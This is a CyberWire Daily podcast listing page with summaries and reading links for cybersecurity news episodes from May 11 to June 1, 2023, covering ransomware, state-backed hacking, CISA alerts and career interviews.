CyberWire Daily - N2K Networks

Firmware comes in through the back door. Leveraging Adobe for credential harvesting. C2C market notes. Hybrid war updates. Jun 01, 2023

A backdoor-like issue has been found in Gigabyte firmware. A credential harvesting campaign impersonates Adobe. The Dark Pink gang is active in southeastern Asia. Mitiga discovers a “significant forensic discrepancy” in Google Drive. "Spyboy" is for sale in the C2C market. A look at Cuba ransomware. Ukrainian hacktivists target the Skolkovo Foundation. The FSB says NSA breached iPhones in Russia. Carole Theriault examines Utah's social media bills aimed at kids online. Our guest is Tucker Callaway of Mezmo to discuss the rise of telemetry pipelines. And spoofing positions and evading sanctions.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/105

Selected reading.

Supply Chain Risk from Gigabyte App Center backdoor (Eclypsium)

Ado-be-gone: Armorblox Stops Adobe Impersonation Attack (Armorblox)

Dark Pink back with a bang: 5 new organizations in 3 countries added to victim list (Group-IB)

Southeast Asian hacking crew racks up victims, rapidly expands criminal campaign (CyberScoop)

Suspected State-Backed Hackers Hit Series of New Targets in Europe, SE Asia (Insurance Journal)

Mitiga Security Advisory: Lack of Forensic Visibility with the Basic License in Google Drive (Mitiga)

2023-05-31 // SITUATIONAL AWARENESS // Spyboy Defense Evasion Tool Advertised Online (Reddit)

An In-Depth Look at Cuba Ransomware (Avertium)

Russia’s ‘Silicon Valley’ hit by cyberattack; Ukrainian group claims deep access (The Record)

Russia says U.S. accessed thousands of Apple phones in spy plot (Reuters)

Fake Signals and American Insurance: How a Dark Fleet Moves Russian Oil (The New York Times

Two RAT infestations. Ghosts of sites past. Trends in identity security. Detecting deepfakes may prove more difficult than you think. May 31, 2023

SeroXen is a new elusive evolution of the Quasar RAT that seems to live up to its hype, and DogeRAT is a cheap Trojan targeting Indian Android users. Salesforce ghost sites see abuse by malicious actors. A look into identity security trends. People may be overconfident in their ability to detect deepfakes. Deepen Desai from Zscaler describes a campaign targeting Facebook users. CW Walker from Spycloud outlines identity exposure in the Fortune 1000. And a blurring of the lines between criminal, hacktivist, and strategic motivations.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/104

Selected reading.

SeroXen RAT for sale (AT&T Cybersecurity)

Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users (The Hacker News)

DogeRAT: The Android Malware Campaign Targeting Users Across Multiple Industries (CloudSek)

Ghost Sites: Stealing Data From Deactivated Salesforce Communities (Varonis)

2023 Trends in Securing Digital Identities (Identity Defined Security Alliance)

Jumio 2023 Online Identity Consumer Study (Jumio)

Void Rabisu’s Use of RomCom Backdoor Shows a Growing Shift in Threat Actors’ Goals (Trend Micro)

Ukraine's DELTA Military System Users Under Attack from Info Stealing Malware (The Hacker News)

Mirai’s new variant targets IoT devices. Volt Typhoon investigation continues. Hacktivism in Senegal. Lessons learned from Ukraine. May 30, 2023

New Mirai malware uses low-complexity exploits to expand its botnet in IoT devices. The latest on Volt Typhoon. DDoS hits government sites in Senegal. The Pentagon's cyber strategy incorporates lessons from Russia's war, while the EU draws lessons from Ukraine's performance against Russia. Joe Carrigan explains Mandiant research on URL obfuscation. Mr. Security Answer Person John Pescatore plays security whack-a-mole. And NoName disrupts a British airport.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/103

Selected reading.

Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices (Unit 42)

US officials believe Chinese hackers may still have access to key US computer networks (CNN)

Chinese state-sponsored hackers infiltrated U.S. naval infrastructure, secretary of the Navy says (CNBC)

US military intelligence also targeted by Chinese hackers behind critical infrastructure compromise (SC Magazine)

Senegalese government websites hit with cyber attack (Reuters)

DOD Transmits 2023 Cyber Strategy (US Department of Defense)

Fact Sheet: 2023 DOD Cyber Strategy (US Department of Defense)

Lessons from the war in Ukraine for the future of EU defence (European Union External Action)

Investigation Launched After London City Airport Website Hacked (Simple Flying)

Maryland high school listed on Zillow for $42K in ‘creative’ senior prank (New York Post)

Stacy Dunn: My superpower and my kryptonite. [Engineer] [Career Notes] May 28, 2023

Stacy Dunn, a Senior Solutions Engineer from the SANS Institute sits down and shares what it is like to work through her own adversity to get to be where she is today. Stacy shares some of her experiences as a woman with ADHD working in an IT career and explains her tips for other neurodiverse people in the field. After working in a wide array of positions in different fields, she wanted to go back to school to get her degree in management information systems and information assurance. Eventually she started working her way up the ladder, and became a very successful woman in the IT world. She shares her struggles with ADHD as she was making the climb and says "It's both a superpower and kryptonite because I think something that is a fundamental misunderstanding of most people, and maybe even some people that do have ADHD, is that it's not just the aspect of not being able to focus, it's also an aspect of focusing too much." We thank Stacy for sharing her story with us.

8 GoAnywhere MFT breaches and counting. [Research Saturday] May 27, 2023

This week, our guests are Emily Austin and Himaja Motheram from Censys and their sharing their research - "Months after first GoAnywhere MFT zero-day attacks, Censys still sees about 180 public admin panels." In early February 2023, Censys researchers discovered a zero-day RCE vulnerability in Fortra’s “GoAnywhere MFT” (Managed File Transfer) software.

After finding this the Clop ransomware gang claimed that they exploited this vulnerability to breach the data of 130 organizations and Censys found other ransomware groups were jumping on the bandwagon. They said " A single vulnerable instance has the potential to serve as a gateway to a data breach that could potentially impact millions of individuals."

The research can be found here:

Months after first GoAnywhere MFT zero-day attacks, Censys still sees ~180 public admin panels

CosmicEnergy: OT and ICS malware from Russia, maybe for red teaming. Updates on Volt Typhoon. Legion malware upgraded for the cloud. Natural-disaster-themed online fraud. May 26, 2023

CosmicEnergy is OT and ICS malware from Russia, maybe for red teaming, maybe for attack. Updates on Volt Typhoon, China’s battlespace preparation in Guam and elsewhere. In the criminal underworld, Legion malware has been upgraded for the cloud. Johannes Ullrich from SANS examines time gaps in logging. Our guest is Kevin Kirkwood from LogRhythm with a look at extortion attempts and ransomware. And Atlantic hurricane season officially opens next week: time to batten down those digital hatches.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/102

Selected reading.

COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises (Mandiant)

People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)

Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)

China hits back at 'the empire of hacking' over Five Eyes US cyber attack claims (ABC)

Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker (Cado)

Legion Malware Upgraded to Target SSH Servers and AWS Credentials (Hacker News)

CISA Warns of Hurricane/Typhoon-Related Scams (Cybersecurity and Infrastructure Security Agency CISA)

Volt Typhoon goes undetected by living off the land. New gang, old ransomware. KillNet says no to slacker hackers. May 25, 2023

China's Volt Typhoon snoops into US infrastructure, with special attention paid to Guam. Iranian cybercriminals are seen conducting ops against Israeli targets. A new ransomware gang uses recycled ransomware. A persistent Brazilian campaign targets Portuguese financial institutions. A new botnet targets the gaming industry. Phishing attempts impersonate OpenAI. Pro-Russian geolocation graffiti. Andrea Little Limbago from Interos addresses the policy implications of ChatGPT. Our guest is Jon Check from Raytheon Intelligence & Space, on cybersecurity and workforce strategy for the space community. And KillNet says no to slacker hackers.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/101

Selected reading.

People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)

Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)

Chinese hackers spying on US critical infrastructure, Western intelligence says (Reuters)

Agrius Deploys Moneybird in Targeted Attacks Against Israeli Organizations (Check Point)

Iran-linked hackers Agrius deploying new ransomware against Israeli orgs (The Record)

Iranian Hackers Set Sights On Israeli Shipping & Logistics Firms (Information Security Buzz)

Fata Morgana: Watering hole attack on shipping and logistics websites (ClearSky Security)

Iran suspect in cyberattack targeting Israeli shipping, financial firms (Al-Monitor)

Buhti: New Ransomware Operation Relies on Repurposed Payloads (Symantec)

Operation Magalenha | Long-Running Campaign Pursues Portuguese Credentials and PII (SentinelOne)

The Dark Frost Enigma: An Unexpectedly Prevalent Botnet Author Profile (Akamai)

Fresh Phish: ChatGPT Impersonation Fuels a Clever Phishing Scam (INKY)

CISA Alert AA23-144A – People's Republic of China state-sponsored cyber actor living off the land to evade detection. [CISA Cybersecurity Alerts] May 25, 2023

Cybersecurity authorities are issuing this joint Cybersecurity Advisory to highlight a recent cluster of activity associated with a People’s Republic of China state-sponsored cyber actor, also known as Volt Typhoon.

AA23-144A Alert, Technical Details, and Mitigations

Active Directory and domain controller hardening: Best Practices for Securing Active Directory | Microsoft Learn

CISA regional cyber threats: China Cyber Threat Overview and Advisories

Microsoft Threat Intelligence blog: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques | Microsoft Security Blog

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Cybercriminals favor cyberespionage in North Korea, Russia, and parts unknown. Movements and activity in the cyber underworld. May 24, 2023

Kimsuky's tailored reconnaissance tools. GoldenJackal is an APT quietly active since 2019. Criminals target Youtube viewers with free cracked software. Rheinmetall’s data was posted to BlackBasta's extortion site. The "Cuba" gang claims credit for the attack on the Philadelphia Inquirer. CERT-UA identifies a probable Russian cyberespionage campaign. Ireland views cyber assistance to Ukraine as a contribution to collective security. Ann Johnson from Afternoon Cyber Tea speaks with Tyrance Billingsley about Black Tech. Our guest is Oz Alashe from CybSafe on raising VC money amidst a down economy. And KillNet's underperforming hacktivists.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/100

Selected reading.

Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit (SentinelOne)

North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware (The Hacker News)

Meet the GoldenJackal APT group. Don’t expect any howls (Kaspersky)

Follina — a Microsoft Office code execution vulnerability (DoublePulsar)

YouTube Pirated Software Videos Deliver Triple Threat: Vidar Stealer, Laplas Clipper, XMRig Miner (FortiGuard Labs)

Arms maker Rheinmetall confirms BlackBasta ransomware attack (Bleeping Computer)

Inquirer and forensics team investigating computer disruptions to publishing (Philadelphia Inquirer)

Cuba ransomware claims cyberattack on Philadelphia Inquirer (Bleeping Computer)

Espionage activity UAC-0063 in relation to Ukraine, Kazakhstan, Kyrgyzstan, Mongolia, Israel, India (CERT-UA#6549) (CERT-UA)

Ukraine Identifies Central Asian Cyberespionage Campaign (BankInfoSecurity)

Ireland’s cyber security agency has been providing ‘non-lethal aid’ to Ukraine (Irish Times)

BlackCat gang crosses your path and evades detection. You’re just too good to be true, can’t money launder for you. Commercial spyware cases. May 23, 2023

AhRat exfiltrates files and records audio on Android devices. The BlackCat ransomware group uses a signed kernel driver to evade detection. GUI-Vil in the cloud. Unwitting money mules. Ben Yelin unpacks the Supreme Court’s section 230 rulings. Our guest is Mike DeNapoli from Cymulate with insights on cybersecurity effectiveness. And a trio of commercial spyware cases.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/99

Selected reading.

Android app breaking bad: From legitimate screen recording to file exfiltration within a year (ESET)

Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials (ESET)

BlackCat Ransomware Deploys New Signed Kernel Driver (Trend Micro)

Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor (Permiso)

Uncle Sam strangles criminals' cashflow by reining in money mules (The Register)

German prosecutors charge four over violating trade act to sell spyware to Turkey (Washington Post)

Israel Torpedoed Morocco Spyware Deal - and NSO Competitor QuaDream Shut Down (Haaretz)

He Was Investigating Mexico’s Military. Then the Spying Began. (New York Times)

Record GDPR fine. Movements in the cyber underworld. FBI found to have overstepped surveillance authorities. May 22, 2023

The EU fines Meta for transatlantic data transfers. FIN7 returns, bearing Cl0p ransomware. Python Package Index temporarily suspends new registrations due to a spike in malicious activity. Typosquatting and TurkoRAT. UNC3944 uses SIM swapping to gain access to Azure admin accounts. A Turla retrospective. Rick Howard tackles workforce development. Our guest is Andrew Peterson of Fastly to discuss the intricate challenges of secure software development. And the FBI was found overstepping its surveillance authorities.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/98

Selected reading.

Meta Fined $1.3 Billion Over Data Transfers to U.S. (Wall Street Journal)

Meta fined record $1.3 billion and ordered to stop sending European user data to US (AP News)

Notorious Cyber Gang FIN7 Returns With Cl0p Ransomware in New Wave of Attacks (The Hacker News)

Researchers tie FIN7 cybercrime family to Clop ransomware (The Record)

Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware (Security Affairs)

PyPI new user and new project registrations temporarily suspended. (Python)

PyPI repository restored after temporarily suspending new activity (Computing)

RATs found hiding in the NPM attic (ReversingLabs)

Legitimate looking npm packages found hosting TurkoRat infostealer (CSO Online)

SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack (Mandiant)

Mozilla Explains: SIM swapping (Mozilla)

The Underground History of Russia’s Most Ingenious Hacker Group (WIRED)

Justice Department Announces Court-Authorized Disruption of Snake Malware Network Controlled by Russia’s Federal Security Service (US Department of Justice)

Hunting Russian Intelligence “Snake” Malware (CISA)

FBI misused intelligence database in 278,000 searches, court says (Reuters)

FBI misused controversial surveillance tool to investigate Jan. 6 protesters (The Record)

FBI broke rules in scouring foreign intelligence on Jan. 6 riot, racial justice protests, court says (AP News)

Cybersecurity moneyball: First principles applied to the workforce gap. [CSO Perspectives] May 22, 2023

Rick Howard, N2K’s CSO and The CyberWire’s Chief Analyst and Senior Fellow, the cybersecurity workforce skills gap with N2K’s President, Simone Petrella regarding how security professionals might learn from the movie “Moneyball” about how to train their team in the aggregate about first principles.

Dawn Cappelli: Becoming the cyber fairy godmother. [OT] [Career Notes] May 21, 2023

Dawn Cappelli, OT CERT Director at Dragos, sits down to share what she has learned after her 25+ year career in the industry. She recalls wanting to have been a rockstar when she grew up, now she refers to herself as the fairy godmother of security. She shares some of the amazing things she got to work on throughout her career, including working with the Secret Service when the Olympics came to Salt Lake City, Utah in 2002. She shares how she was able to rise through the ranks to get to where she is now. Dawn talks about how she wasn't ready to retire quite yet because she loved the industry so much, saying "I retired, but I knew I still loved security. I have this passion for protection and so Dragos came along and they offered me this role of Director of OT CERT. I feel like I'm the security fairy godmother." She shares words of wisdom for all trying to get into the industry, saying that you need to always take the risk like she did when she first started her career. We thank Dawn for sharing her story with us.

Dangerous vulnerabilities in H.264 decoders. [Research Saturday] May 20, 2023

Willy R. Vasquez from The University of Texas at Austin discussing research on "The Most Dangerous Codec in the World - Finding and Exploiting Vulnerabilities in H.264 Decoders." Researchers are looking at the marvel that is modern video encoding standards such as H.264 for vulnerabilities and ultimately hidden security risks.

The research states "We introduce and evaluate H26FORGE, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files." Using H26FORCE, they were able to uncover insecurities in depth across the video decoder ecosystem, including kernel memory corruption bugs in iOS and video accelerator and application processor kernel memory bugs in Android devices.

The research can be found here:

The Most Dangerous Codec in the World: Finding and Exploiting Vulnerabilities in H.264 Decoders

Section 230 survives court tests. Pre-infected devices. IRS cyber attachés. DraftKings hack indictment. Notes on the hybrid war. May 19, 2023

Section 230 survives SCOTUS. Lemon Group's pre-infected devices. The IRS is sending cyber attachés to four countries in a new pilot program. A Wisconsin man is charged with stealing DraftKings credentials. Russian hacktivists conduct DDoS attacks against Polish news outlets. An update on RedStinger. Grayson Milbourne from OpenText Cybersecurity discusses IoT and the price we pay for convenience. Our guest is Matthew Keeley with info on an open source domain spoofing tool, Spoofy. And war principles and hacktivist auxiliaries.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/97

Selected reading.

“Honey, I’m Hacked”: Ethical Questions Raised by Ukrainian Cyber Deception of Russian Military Wives (Just Security)

A Mysterious Group Has Ties to 15 Years of Ukraine-Russia Hacks (Wired)

CloudWizard APT: the bad magic story goes on (SecureList)

Ukraine at D+441: Skirmishing along the line of contact, and in cyberspace. (The CyberWire)

Russian dissident gets three years in prison colony for DDoS attacks on military website (Cybernews)

Europe: The DDoS battlefield (Help Net Security)

Russian hackers hit Polish news sites in DDoS attack (Cybernews)

18-year-old charged with hacking 60,000 DraftKings betting accounts (Bleeping Computer)

Garrison Complaint (Department of Justice)

IRS-CI deploys 4 cyber attachés to locations abroad to combat cybercrime (IRS)

IRS deploys cyber attachés to fight cybercrime abroad (The Hill)

Cybercrime gang pre-infects millions of Android devices with malware (Bleeping Computer)

This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide (The Hacker News)

Lemon Group’s Cybercriminal Businesses Built on Preinfected Devices (Trend Micro)

BEC attack exploits Dropbox services. Ransomware in the name of charity. API protection trends. Hybrid war hacktivism. Executive digital protection. May 18, 2023

Business email compromise (BEC) exploits legitimate services. A hacktivist ransomware group demands charity donations for encrypted files. Trends and threats in API protection. The effects of hacktivism on Russia's war against Ukraine. Executive digital protection. Deepen Desai of Zscaler explains security risks in OneNote. Our guest is Ajay Bhatia of Veritas Technologies with advice for onboarding new employees. And news organizations as attractive targets.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/96

Selected reading.

Leveraging Dropbox to Soar Into Inbox (Avanan)

MalasLocker ransomware targets Zimbra servers, demands charity donation (Bleeping Computer)

Shadow API Usage Surges 900%, Revealing Alarming Lack of API Visibility Among Enterprises (Business Wire)

APIs are Top Cybersecurity Priority for Most Organizations, Yet 40% Do Not Have an API Security Solution (PR Newswire)

Evolving Cyber Operations and Capabilities (CSIS)

Following the long-running Russian aggression against Ukraine. (The CyberWire)

Executive Digital Protection whitepaper (Agency)

The Philadelphia Inquirer’s operations continue to be disrupted by a cyber incident (The Philadelphia Inquirer)

Cyberattack at the Philadelphia Inquirer. (The CyberWire)

CISA Alert AA23-136A – #StopRansomware: BianLian Ransomware Group. [CISA Cybersecurity Alerts] May 18, 2023

FBI, CISA, and the Australian Cyber Security Centre are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.

AA23-136A Alert, Technical Details, and Mitigations

AA23-136A.STIX_.xml

Stopransomware.gov, a whole-of-government approach with one central location for U.S. ransomware resources and alerts.

cyber.gov.au for the Australian Government’s central location to report cyber incidents, including ransomware, and to see advice and alerts. The site also provides ransomware advisories for businesses and organizations to help mitigate cyber threats.

CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide for guidance on mitigating and responding to a ransomware attack

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

A joint warning on BianLian ransomware. Fleeceware offers AI as bait for the gullible. Cyberespionage updates. And Ukraine formally joins NATO’s CCDCOE. May 17, 2023

Cyber agencies warn of BianLian ransomware. There’s a new gang using leaked Baduk-based ransomware. Chinese government-linked threat actors target TP-link routers with custom malware. ChatGPT-themed fleeceware is showing up in online stores. Ukraine is now a member of NATO's Cyber Centre. Tim Starks from the Washington Post shares insights on section 702 renewal. Our guest is Ismael Valenzuela from BlackBerry sharing the findings from their Global Threat Intelligence Report. And the CIA's offer to Russian officials may have had some takers.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/95

Selected reading.

#StopRansomware: BianLian Ransomware Group (Cybersecurity and Infrastructure Security Agency CISA)

Newly identified RA Group compromises companies in U.S. and South Korea with leaked Babuk source code (Cisco Talos Blog)

The Dragon Who Sold His Camaro: Analyzing Custom Router Implant (Check Point Research)

Fake ChatGPT Apps Scam Users Out of Thousands of Dollars, Sophos Reports (GlobeNewswire News Room)

Ukraine joins NATO Cyber Centre (Computing)

Russian Officials Unnerved by Ukraine Bloodshed Are Contacting CIA, Agency Says (Wall Street Journal)

What is data centric security and why should anyone care? [CyberWire-X] May 17, 2023

In today’s world, conventional cyber thinking remains largely focused on perimeter-centric security controls designed to govern how identities and endpoints utilize networks to access applications and data that organizations possess internally. Against this backdrop, a group of innovators and security thought leaders are exploring a new frontier and asking the question: shouldn’t there be a standard way to protect sensitive data regardless of where it resides or who it’s been shared with? It’s called “data-centric” security and it’s fundamentally different from “perimeter-centric” security models. Practicing it at scale requires a standard way to extend the value of “upstream” data governance (discovery, classification, tagging) into “downstream” collaborative workflows like email, file sharing, and SaaS apps.

In this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner explore modern approaches for applying and enforcing policy and access controls to sensitive data which inevitably leaves your possession but still deserves just as much security as the data that you possess internally. Rick and Dave are joined by guests Bill Newhouse, Cybersecurity Engineer at National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE), and Dana Morris, Senior Vice President for Product and Engineering of our episode sponsor Virtru.

DDoS trends. Asia sees a Lancefly infestation. Lessons from cyber actuaries. Infostealers in the C2C market. False flags. May 16, 2023

DDoS "carpet bombing." Lancefly infests Asian targets. Cyber insurance trends. Infostealers in the C2C market. A Russian espionage service is masquerading as a criminal gang. KillNet’s running a psyop radio station of questionable quality. Joe Carrigan describes baiting fraudsters with fake crypto. Our guest is Gemma Moore of Cyberis talking about how red teaming can upskill detection and response teams. And geopolitical DDoS.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/94

Selected reading.

2023 DDoS Threat Intelligence Report (Corero)

Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors (Symantec)

2023 Cyber Claims Report (Coalition)

The Growing Threat from Infostealers (Secureworks)

Cybercriminals who targeted Ukraine are actually Russian government hackers, researchers say (TechCrunch)

DDoS Attacks Targeting NATO Members Increasing (Netscout)

Following the long-running Russian aggression against Ukraine. (The CyberWire)

Ransomware, doxxing, and data breaches, oh my! State fronts and cyber offensives. May 15, 2023

Discord sees a third-party data breach. Black Basta conducts a ransomware attack against technology company ABB. Intrusion Truth returns to dox APT41. Anonymous Sudan looks like a Russian front operation. Attribution and motivation of "RedStinger" remain murky. CISA summarizes Russian cyber offensives. Remote code execution exploits Ruckus in the wild. Our guest is Dave Russell from Veeam with insights on data protection. Matt O'Neill from the US Secret Service on their efforts to thwart email compromise and romance scams. And espionage by way of YouTube comments.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/93

Selected reading.

Discord discloses data breach after support agent got hacked (Bleeping Computer)

Discord suffered a data after third-party support agent was hacked (Security Affairs)

Multinational tech firm ABB hit by Black Basta ransomware attack (Bleeping Computer)

Breaking: ABB confirms cyberattack; work underway to restore operations (ET CISO)

Black Basta conducts ransomware attack against Swiss technology company ABB (The CyberWire)

They dox Chinese hackers. Now, they’re back. (Washington Post)

What’s Cracking at the Kerui Cracking Academy? (Intrusion Truth)

Posing as Islamists, Russian Hackers Take Aim at Sweden (Bloomberg)

Anonymous Sudan: Threat Intelligence Report (TrueSec)

Uncovering RedStinger - Undetected APT cyber operations in Eastern Europe since 2020 (Malwarebytes)

Russian ‘Red Stealer’ cyberattacks target breakaway territories in Ukraine (Cybernews)

Russia Cyber Threat Overview and Advisories (CISA)

Known Exploited Vulnerabilities Catalog (CISA)

CISA Adds Seven Known Exploited Vulnerabilities to Catalog (CISA)

CISA warns of critical Ruckus bug used to infect Wi-Fi access points (Bleeping Computer)

Security Bulletins (Ruckus)

ROK union leaders charged with spying for North Korea in ‘movie-like’ scheme (NK News)

Steve Benton: Mixing like a DJ. [VP] [Career Notes] May 14, 2023

Steve Benton, Vice President at Anomali Threat Research & GM Belfast, sits down to share his story as a cybersecurity expert with a surplus of strategic leadership experience across cyber and physical security rooted in substantial operational directorship and accountability. Steve shares his beginnings, where he wanted to grow up to be a rockstar, slowly moving into the world of tech with his first ever computer and falling in love with it. After graduating from Queens University with a degree in information technology, he joined British Telecommunications or BT, where he got to put his new found skills to use. Steve mentions how his job is kind of like being a DJ almost and says " a typical day for me is looking at the intelligence that we're bringing in, mixing it as it were to think of a slight, like DJs with a set of headphones on creating the right kind of mixes of intelligence for our clients." We thank Steve for sharing his story with us.

Running away from operation Tainted Love. [Research Saturday] May 13, 2023

Aleksandar Milenkoski and Juan Andres Guerrero-Saade from SentinelOne's SentinelLabs join Dave to discuss their research "Operation Tainted Love | Chinese APTs Target Telcos in New Attacks." Researchers found initial phases of attacks against telecommunication providers in the Middle East in Q1 in 2023.

The research states "We assess that this activity represents an evolution of tooling associated with Operation Soft Cell." While the exact grouping is unclear, researchers think it is highly likely that the threat actor is a Chinese cyberespionage group in the nexus of Gallium and APT41.

The research can be found here:

Operation Tainted Love | Chinese APTs Target Telcos in New Attacks

CISA Alert AA23-131A – Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG. May 12, 2023

FBI and CISA are releasing this joint Cybersecurity Advisory in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF, software applications that help organizations manage printing services, and enables an unauthenticated actor to execute malicious code remotely without credentials.

AA23-131A Alert, Technical Details, and Mitigations

PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)

Huntress: Critical Vulnerabilities in PaperCut Print Management Software

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Babuk resurfaces for criminal inspiration. Alert on PaperCut vulnerability exploitation. Too many bad bots. Phishing-as-a-service in the C2C market. KillNet's PMHC regrets. May 12, 2023

Babuk source code provides criminal inspiration. CISA and FBI release a joint report on PaperCut. There are more bad bots out there than anyone would like. Phishing-as-a-service tools in the C2C market. CISA’s Eric Goldstein advocates the adoption of strong controls, defensible networks and coordination of strategic cyber risks. Our cyberwire producer Liz Irvin speaks with Crystle-Day Villanueva, Learning and Development Specialist for Lumu Technologies. And KillNet’s short-lived venture, with a dash of regret.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/92

Selected reading.

Babuk code used by 9 ransomware gangs to encrypt VMWare ESXi servers (Bleeping Computer)

Ransomware actors adopt leaked Babuk code to hit Linux systems (Decipher)

Hypervisor Ransomware | Multiple Threat Actor Groups Hop on Leaked Babuk Code to Build ESXi Lockers (SentinelOne)

Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG (CISA)

CVE-2023-27350 Detail (NIST)

Proofpoint Emerging Threats Rules (Proofpoint)

2023 Imperva Bad Bot Report (Imperva)

New phishing-as-a-service tool “Greatness” already seen in the wild (Cisco Talos)

Ukraine at D+442: Russians say the Ukrainian counteroffensive has begun. (CyberWire)

Ransomware and social engineering trends. Expired certificate addressed. Ransomware groups target schools. Cyber updates in the hybrid war. May 11, 2023

A Ransomware report highlights targeting and classification. Phishing remains a major threat. Cisco addresses an expired certificate issue. LockBit and Medusa hit school districts with ransomware. US and Canadian cyber units wrap up a hunt-forward mission in Latvia. Ben Yelin on NYPD surveillance. Our CyberWire producer Liz Irvin interviews Damien Lewke, a graduate student at MIT. And an unknown threat actor is collecting against both Russia and Ukraine.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/91

Selected reading.

GRIT Ransomware Report: April 2023 (GuidePoint Security)

DNSFilter State of Internet Security - Q1 2023 (DNSFilter)

Identify vEdge Certificate Expired on May 9th 2023 (Cisco)

The State of Ransomware Attacks in Education 2023: Trends and Solutions (Veriti)

US Cyber Command 'Hunts Forward' in Latvia (Voice of America)

US cyber team unearths malware during ‘hunt-forward’ mission in Latvia (C4ISRNET)

Uncovering RedStinger - Undetected APT cyber operations in Eastern Europe since 2020 (Malwarebytes)

Bad magic: new APT found in the area of Russo-Ukrainian conflict (Kaspersky)

CISA Alert AA23-129A – Hunting Russian intelligence “Snake” malware. May 11, 2023

The Snake implant is considered the most sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service, or FSB, for long-term intelligence collection on sensitive targets.

AA23-129A Alert, Technical Details, and Mitigations

For more information on FSB and Russian state-sponsored cyber activity, please see the joint advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and CISA’s Russia Cyber Threat Overview and Advisories webpage.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

